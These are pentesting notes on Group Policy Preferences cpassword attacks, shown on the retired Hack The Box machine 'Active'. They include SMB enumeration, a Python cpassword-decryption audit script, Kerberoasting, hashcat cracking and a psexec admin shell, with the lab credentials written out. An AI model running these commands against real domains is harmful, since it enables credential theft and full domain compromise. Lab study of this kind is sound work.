# GPP/cPassword Attacks

* GPP (Group Policy Preferences) stores the passwords it sets in XML files (here `Groups.xml`), in an attribute called `cpassword`
* Works over SMB, since these policy files sit in shares every domain user can read
* If we find 445 open we can try to log in anonymously. *Example from HTB - Active - Retired Machine*
* Tips: `prompt off` (no confirmation prompt for each downloaded file) and `recurse on` (makes `ls`/`mget` descend into subdirectories)

  ```
  ┌──(kali㉿kali)-[~]
  └─$ smbclient \\\\10.10.10.100\\Replication
  Enter WORKGROUP\kali's password: 
  Anonymous login successful
  Try "help" to get a list of possible commands.
  smb: \> dir
    .                                   D        0  Sat Jul 21 06:37:44 2018
    ..                                  D        0  Sat Jul 21 06:37:44 2018
    active.htb                          D        0  Sat Jul 21 06:37:44 2018

                  5217023 blocks of size 4096. 260455 blocks available
  smb: \> prompt off
  smb: \> 
  ```
* We can get all the files using `mget *`
* We are interested in the `Groups.xml` file, which is downloaded to `active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/`
* We can just copy the `cpassword` value and decrypt it using gpp-decrypt (no cracking needed: the AES key is published by Microsoft): `gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ`. We get the password: `GPPstillStandingStrong2k18`
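The decryption step above, as an added example (not the page's or gpp-decrypt's own code) written as a small SYSVOL audit: it parses a `Groups.xml`, flags every `cpassword` attribute and recovers the plaintext with the AES key Microsoft documented, which is exactly why these values must be treated as exposed and removed (MS14-025). The sample XML is constructed from the page's value; it assumes either `cryptography` or `pycryptodome` is installed.

```python
"""Audit a GPP Groups.xml for cpassword attributes and recover the plaintext."""
import base64
import xml.etree.ElementTree as ET

# AES-256 key published by Microsoft for the GPP cpassword scheme (MS14-025).
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)


def _aes_cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    """AES-CBC with an all-zero IV; uses 'cryptography', else 'pycryptodome'."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(bytes(16))).decryptor()
        return dec.update(ciphertext) + dec.finalize()
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome fallback
        return AES.new(key, AES.MODE_CBC, iv=bytes(16)).decrypt(ciphertext)


def decrypt_cpassword(cpassword: str) -> str:
    """GPP strips base64 '=' padding; restore it, decrypt, drop PKCS7, decode UTF-16LE."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    plaintext = _aes_cbc_decrypt(GPP_KEY, base64.b64decode(padded))
    plaintext = plaintext[: -plaintext[-1]]  # PKCS7: last byte is the pad length
    return plaintext.decode("utf-16-le")


def audit_groups_xml(xml_text: str) -> list[dict]:
    """One finding per <Properties> element that carries a cpassword attribute."""
    findings = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        enc = props.get("cpassword")
        if enc:
            findings.append({"user": props.get("userName"), "password": decrypt_cpassword(enc)})
    return findings


# Constructed sample modelled on the Groups.xml from the box; cpassword is the page's value.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS">
    <Properties action="U" userName="active.htb\\SVC_TGS"
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for finding in audit_groups_xml(SAMPLE_GROUPS_XML):
        print(f"cpassword exposed for {finding['user']}: {finding['password']}")
```

Run it against every `*.xml` under `SYSVOL\<domain>\Policies` to find leftover cpassword entries; the fix is to delete those preferences and rotate the accounts, not to re-encrypt them.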

## HTB - Active - privesc

* The password obtained from GPP only gives us the user flag. To root the machine we use Kerberoasting again:

  ```
  ┌──(kali㉿kali)-[~]
  └─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
  /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

  ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
  --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
  active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2022-02-11 16:21:53 

  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1
  ```
* We can then crack the TGS hash with hashcat (mode 13100)

  ```
  ┌──(root💀kali)-[~/active-directory]
  └─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
  [STRIPPED]
  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968
  ```
* And finally get a shell using psexec.py (Impacket)

  ```
  ┌──(root💀kali)-[~/active-directory]
  └─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100  
  ```

## GPP - Resources

{% embed url="https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/" %}
Group Policy Pwnage
{% endembed %}
